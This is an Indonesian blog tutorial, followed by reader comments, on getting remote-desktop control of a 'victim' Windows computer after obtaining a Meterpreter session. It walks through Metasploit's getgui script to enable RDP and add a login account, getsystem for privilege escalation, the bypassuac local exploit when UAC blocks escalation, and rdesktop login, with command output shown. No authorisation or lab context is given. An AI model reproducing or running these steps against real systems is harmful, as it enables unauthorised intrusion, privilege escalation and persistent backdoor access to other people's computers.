Pada postingan kali ini saya akan memberikan tutorial mengenai cara mendapatkan akses remote desktop victim. 'getgui' merupakan sebuah script meterpreter yang memungkinkan untuk mengaktifkan Remote Desktop dan membuat account pengguna untuk login ke dalamnya (offensive-security)

Oke, mari kita mulai.
Saya asumsikan disini kalain sudah mendapatkan sesi meterpreter dari sistem target, untuk cara mendapatkannnya kalian bisa lihat di tutorial sebelumnya mengenai Metasploit

sysinfo

Oke untuk mengaktifkan Remote Desktop Connection dari target, kita gunakan getgui untuk membuat account, perintahnya:
run getgui -u <username> -p <password>
run getgui -u <username> -p <password>

Jika muncul pesan Insufficient privileges, itu menunjukkan bahwa kita tidak diperbolehkan untuk menjalankan perintah tersebut. jadi kita harus mendapatkan hak istimewa (Administrator) dalam sistem tersebut atau sebagai root jika di Linux.
nah untuk mendapatkan hak tersebut gunakan perintah berikut ini
getsystem
getsystem failed

Apabila muncul pesan seperti berikut
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Itu biasanya karena UAC (User Account Control System) target sedang aktif. namun jangan khawatir metasploit memiliki module exploit untuk melakukan bypass UAC.
Sebelum menggunakan module exploit tersebut kita berjalan sebagai background terlebih dahulu dari meterpreter yang sedang aktif
background
background

Lalu gunakan module exploit exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
show options (opsional)
set session 1 (sessions yang sebelumnya di dapatkan)
use exploit/windows/local/bypassuac

Lalu jalankan exploit kembali
exploit
exploit

Nah jika berhasil, sekarang kita telah mendapatkan hak Administrator atau sebagai root dalam sistem target
getsystem succes

Coba jalankan getgui kembali untuk membuat account Remote Desktop Cennection
run getgui -u <username> -p <password>
run getgui -u <username> -p <password>

Screenshot di atas menunjukkan Account RDP telah berhasil di buat, lalu kita coba login dengan rdesktop, gunakan perintah berikut.
rdesktop -u <username> -p <password> IP <ip-addres-target>
rdesktop -u <username> -p <password> IP <ip-addres-target>

Tunggu beberapa saat
Preparing your desktop

Nah setelah berhasil login sekarng kita dapt mengoperasikan komputer target dengan mouse dan keyboard kita sendiri.
Login Success

System properties target
System Properties

Nah jika kalian masih bingung, kalian dapat melihat video di bawah ini


Sekian tutorial mengenai Cara Mengaktifkan Remote Desktop Victim Setelah Masuk Meterpreter, semoga bermanfaat.

Posting Komentar

  1. mendapatkan sesi meterpreternya dengan target harus koneksi internet tidak? jika ya, harus pakai wlan0 ataukah eth0?

    BalasHapus
  2. Kalau pake backbox , itu di rdekstopnya pake apa

    BalasHapus
  3. pass sama usernya itu dapet dari mana mas?

    BalasHapus
    Balasan
    1. username sama passwd kita sendiri yg nentuin mas

      Hapus
  4. exploit aborted due to failure: not-vulnerable: Unknown (Build 10586). is not vulnerable..

    itu gimana ya gan>

    BalasHapus
  5. cm kopas aja ni blog di tanya ini itu g bs jawab.sampah

    BalasHapus
  6. keren om..... dibanyaki lagi tutorialnya

    BalasHapus
  7. gan gua uda tahap terakhir jadi nya gni nih,
    meterpreter > rdesktop -u xNoMx09 -p basop 192.168.100.1
    [-] Unknown command: rdesktop.
    apa karna pc gua yg 32bit kagak bisa ngeremote pc yg 64bit??

    BalasHapus

 
Top